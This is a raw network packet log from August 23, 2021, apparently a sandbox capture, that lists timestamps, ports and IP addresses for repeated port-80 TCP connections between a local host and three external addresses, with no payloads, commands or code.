Aug 23, 2021 02:09:00.845558882 CEST	80	49773	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:00.845597982 CEST	80	49773	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:00.845864058 CEST	80	49773	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:00.846019030 CEST	80	49773	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:00.846096992 CEST	80	49773	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:00.867930889 CEST	49777	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.868983984 CEST	49778	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.893346071 CEST	80	49777	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.894247055 CEST	80	49778	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.894284010 CEST	49777	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.894469976 CEST	49778	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.894941092 CEST	49778	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.920239925 CEST	80	49778	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.921181917 CEST	80	49778	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.921197891 CEST	80	49778	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.921289921 CEST	49778	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.921336889 CEST	49778	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.970426083 CEST	80	49775	220.125.1.129	192.168.2.3
Aug 23, 2021 02:09:01.023680925 CEST	49778	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:01.028776884 CEST	49779	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:01.049319029 CEST	80	49778	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:01.049448013 CEST	49778	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:01.054039001 CEST	80	49779	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:01.054687977 CEST	49779	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:01.055171013 CEST	49779	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:01.080408096 CEST	80	49779	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:01.081334114 CEST	80	49779	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:01.081373930 CEST	80	49779	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:01.081444979 CEST	49779	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:01.100995064 CEST	49773	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:01.161628962 CEST	80	49773	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:01.161860943 CEST	49773	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:01.199276924 CEST	49779	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:01.200572968 CEST	49780	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:01.222587109 CEST	80	49773	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:01.222630978 CEST	80	49773	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:01.222657919 CEST	80	49773	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:01.222683907 CEST	80	49773	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:01.222702980 CEST	80	49773	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:01.222753048 CEST	49773	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:01.222816944 CEST	49773	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:01.224659920 CEST	80	49779	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:01.225189924 CEST	49779	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:01.225824118 CEST	80	49780	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:01.225938082 CEST	49780	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:01.226782084 CEST	49780	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:01.252032995 CEST	80	49780	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:01.252722979 CEST	80	49780	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:01.252754927 CEST	80	49780	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:01.252872944 CEST	49780	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:01.283240080 CEST	80	49773	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:01.283282995 CEST	80	49773	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:01.367336035 CEST	49780	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:01.368319035 CEST	49781	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:01.392991066 CEST	80	49780	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:01.393137932 CEST	49780	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:01.394052029 CEST	80	49781	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:01.394216061 CEST	49781	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:01.394623995 CEST	49781	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:01.419888020 CEST	80	49781	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:01.420753956 CEST	80	49781	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:01.420790911 CEST	80	49781	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:01.420855999 CEST	49781	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:01.420877934 CEST	49781	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:01.522824049 CEST	49773	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:01.524368048 CEST	49781	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:01.541685104 CEST	49782	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:01.550415993 CEST	80	49781	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:01.550501108 CEST	49781	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:01.567593098 CEST	80	49782	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:01.567785025 CEST	49782	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:01.568423033 CEST	49782	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:01.584361076 CEST	80	49773	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:01.584466934 CEST	49773	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:01.596070051 CEST	80	49782	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:01.596807003 CEST	80	49782	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:01.596821070 CEST	80	49782	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:01.596965075 CEST	49782	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:01.645148039 CEST	80	49773	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:01.711354971 CEST	49782	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:01.712328911 CEST	49783	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:01.717005968 CEST	80	49773	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:01.717241049 CEST	49773	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:01.736937046 CEST	80	49782	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:01.737066031 CEST	49782	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:01.738260031 CEST	80	49783	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:01.738395929 CEST	49783	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:01.742490053 CEST	49783	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:01.767786026 CEST	80	49783	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:01.769962072 CEST	80	49783	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:01.769984007 CEST	80	49783	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:01.770114899 CEST	49783	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:01.883457899 CEST	49783	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:01.884520054 CEST	49784	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:01.908823967 CEST	80	49783	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:01.908931017 CEST	49783	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:01.910070896 CEST	80	49784	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:01.910419941 CEST	49784	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:01.911822081 CEST	49784	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:01.935607910 CEST	80	49775	220.125.1.129	192.168.2.3
Aug 23, 2021 02:09:01.935645103 CEST	80	49775	220.125.1.129	192.168.2.3
Aug 23, 2021 02:09:01.935753107 CEST	49775	80	192.168.2.3	220.125.1.129
Aug 23, 2021 02:09:01.935784101 CEST	49775	80	192.168.2.3	220.125.1.129
Aug 23, 2021 02:09:01.937035084 CEST	80	49784	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:01.938365936 CEST	80	49784	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:01.938394070 CEST	80	49784	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:01.938481092 CEST	49784	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:01.993359089 CEST	49785	80	192.168.2.3	220.125.1.129
Aug 23, 2021 02:09:02.029066086 CEST	49784	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.029148102 CEST	49784	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.029349089 CEST	49784	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.029524088 CEST	49784	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.054519892 CEST	80	49784	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.054574966 CEST	80	49784	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.054650068 CEST	80	49784	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.054672003 CEST	49784	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.054815054 CEST	49784	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.054975033 CEST	80	49784	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.055051088 CEST	49784	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.056988955 CEST	80	49784	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.057285070 CEST	49784	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.080034018 CEST	80	49784	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.080133915 CEST	49784	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.080187082 CEST	80	49784	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.080265999 CEST	49784	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.080288887 CEST	80	49784	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.080369949 CEST	49784	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.080451965 CEST	80	49784	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.080537081 CEST	80	49784	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.080569983 CEST	49784	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.080621958 CEST	49784	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.080717087 CEST	80	49784	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.080780029 CEST	49784	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.082590103 CEST	80	49784	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.082695007 CEST	80	49784	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.082709074 CEST	49784	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.082761049 CEST	80	49784	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.082794905 CEST	49784	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.082850933 CEST	49784	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.106112957 CEST	80	49784	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.107222080 CEST	49784	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.110028028 CEST	80	49784	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.110040903 CEST	80	49784	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.110048056 CEST	80	49784	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.110060930 CEST	80	49784	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.110075951 CEST	80	49784	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.121835947 CEST	49786	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.132447004 CEST	80	49784	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.133645058 CEST	80	49784	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.133661032 CEST	80	49784	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.133753061 CEST	49784	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.134793997 CEST	49784	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.134812117 CEST	49784	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.147135019 CEST	80	49786	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.147269964 CEST	49786	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.156601906 CEST	49773	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:02.157072067 CEST	49786	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.157720089 CEST	49787	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:02.182405949 CEST	80	49786	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.183234930 CEST	80	49786	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.183257103 CEST	80	49786	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.183384895 CEST	49786	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.199544907 CEST	80	49775	220.125.1.129	192.168.2.3
Aug 23, 2021 02:09:02.216984987 CEST	80	49773	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:02.217277050 CEST	49773	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:02.218101025 CEST	80	49787	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:02.218216896 CEST	49787	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:02.219069958 CEST	49787	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:02.219109058 CEST	49787	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:02.219230890 CEST	49787	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:02.219335079 CEST	49787	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:02.264833927 CEST	80	49785	220.125.1.129	192.168.2.3
Aug 23, 2021 02:09:02.264971972 CEST	49785	80	192.168.2.3	220.125.1.129
Aug 23, 2021 02:09:02.265095949 CEST	49785	80	192.168.2.3	220.125.1.129
Aug 23, 2021 02:09:02.265110970 CEST	49785	80	192.168.2.3	220.125.1.129
Aug 23, 2021 02:09:02.279463053 CEST	80	49787	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:02.279580116 CEST	80	49787	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:02.279922009 CEST	80	49787	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:02.280235052 CEST	80	49787	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:02.280324936 CEST	49787	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:02.280329943 CEST	80	49787	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:02.280540943 CEST	49787	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:02.280565977 CEST	80	49787	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:02.280695915 CEST	49787	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:02.280905008 CEST	80	49787	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:02.281122923 CEST	80	49787	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:02.281172991 CEST	49787	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:02.281224012 CEST	49787	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:02.281347036 CEST	80	49787	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:02.281373978 CEST	80	49787	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:02.281483889 CEST	49787	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:02.281512976 CEST	49787	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:02.281624079 CEST	80	49787	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:02.281721115 CEST	49787	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:02.282025099 CEST	80	49787	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:02.282393932 CEST	49787	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:02.289465904 CEST	49786	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.290383101 CEST	49788	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.315001965 CEST	80	49786	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.315119982 CEST	49786	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.315665007 CEST	80	49788	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.315790892 CEST	49788	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.340404987 CEST	80	49787	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:02.340498924 CEST	49787	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:02.340605021 CEST	80	49787	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:02.340683937 CEST	80	49787	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:02.340694904 CEST	80	49787	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:02.340760946 CEST	49787	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:02.340801001 CEST	49787	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:02.340835094 CEST	80	49787	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:02.340907097 CEST	49787	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:02.341240883 CEST	80	49787	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:02.341296911 CEST	80	49787	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:02.341373920 CEST	49787	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:02.341768026 CEST	80	49787	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:02.341855049 CEST	80	49787	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:02.341958046 CEST	49787	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:02.342533112 CEST	80	49787	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:02.343455076 CEST	49787	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:02.353874922 CEST	49788	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.379631042 CEST	80	49788	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.380392075 CEST	80	49788	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.380425930 CEST	80	49788	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.380490065 CEST	49788	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.380872965 CEST	49788	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.389630079 CEST	80	49787	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:02.390039921 CEST	49787	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:02.402141094 CEST	80	49787	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:02.402266026 CEST	49787	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:02.402628899 CEST	80	49787	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:02.402704000 CEST	80	49787	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:02.402829885 CEST	80	49787	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:02.402842999 CEST	80	49787	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:02.402952909 CEST	80	49787	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:02.403826952 CEST	80	49787	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:02.403953075 CEST	80	49787	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:02.404160976 CEST	80	49787	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:02.404606104 CEST	80	49787	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:02.405057907 CEST	80	49787	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:02.405090094 CEST	80	49787	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:02.450212002 CEST	80	49787	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:02.450308084 CEST	80	49787	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:02.462639093 CEST	80	49787	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:02.462668896 CEST	80	49787	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:02.495285034 CEST	49788	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.496154070 CEST	49789	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.505309105 CEST	80	49787	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:02.505842924 CEST	49787	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:02.520622015 CEST	80	49788	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.520700932 CEST	49788	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.521430016 CEST	80	49789	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.521506071 CEST	49789	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.522109032 CEST	49789	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.536679983 CEST	80	49785	220.125.1.129	192.168.2.3
Aug 23, 2021 02:09:02.547362089 CEST	80	49789	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.547995090 CEST	80	49789	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.548027039 CEST	80	49789	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.548108101 CEST	49789	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.548154116 CEST	49789	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.664452076 CEST	49789	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.665471077 CEST	49790	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.689862967 CEST	80	49789	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.689975023 CEST	49789	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.690814972 CEST	80	49790	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.690963984 CEST	49790	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.716130018 CEST	49790	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.741507053 CEST	80	49790	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.742093086 CEST	80	49790	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.742125988 CEST	80	49790	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.742238998 CEST	49790	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.753321886 CEST	49790	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.753406048 CEST	49790	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.753563881 CEST	49790	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.753662109 CEST	49790	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.779999971 CEST	80	49790	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.780034065 CEST	80	49790	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.780069113 CEST	80	49790	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.780153036 CEST	49790	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.780239105 CEST	49790	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.806169987 CEST	80	49790	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.806276083 CEST	80	49790	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.806405067 CEST	49790	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.806512117 CEST	49790	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.831676006 CEST	80	49790	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.831703901 CEST	80	49790	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.831810951 CEST	80	49790	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.831824064 CEST	49790	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.831837893 CEST	80	49790	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.831909895 CEST	80	49790	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.831926107 CEST	80	49790	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.831980944 CEST	80	49790	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.831999063 CEST	80	49790	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.832103968 CEST	80	49790	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.832314014 CEST	80	49790	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.857338905 CEST	80	49790	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.857367039 CEST	80	49790	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.857381105 CEST	80	49790	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.857395887 CEST	80	49790	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.858660936 CEST	80	49790	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.858680964 CEST	80	49790	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.858910084 CEST	49790	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.860125065 CEST	49790	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.860234022 CEST	49790	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.863476992 CEST	49787	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:02.866157055 CEST	49791	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:02.869200945 CEST	49792	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.894495010 CEST	80	49792	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.894855976 CEST	49792	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.898993969 CEST	49792	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.922277927 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:02.922413111 CEST	49791	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:02.922804117 CEST	49791	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:02.922894001 CEST	49791	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:02.923017025 CEST	49791	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:02.923089981 CEST	49791	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:02.923525095 CEST	80	49787	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:02.923604012 CEST	49787	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:02.924140930 CEST	80	49792	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.924784899 CEST	80	49792	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.924802065 CEST	80	49792	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:02.929281950 CEST	49792	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:02.978785992 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:02.978811979 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:02.979063988 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:02.979151011 CEST	49791	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:02.979464054 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:02.979537964 CEST	49791	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:02.979744911 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:02.979852915 CEST	49791	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:02.980303049 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:02.980379105 CEST	49791	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:02.980604887 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:02.980688095 CEST	80	49791	185.215.113.206	192.168.2.3
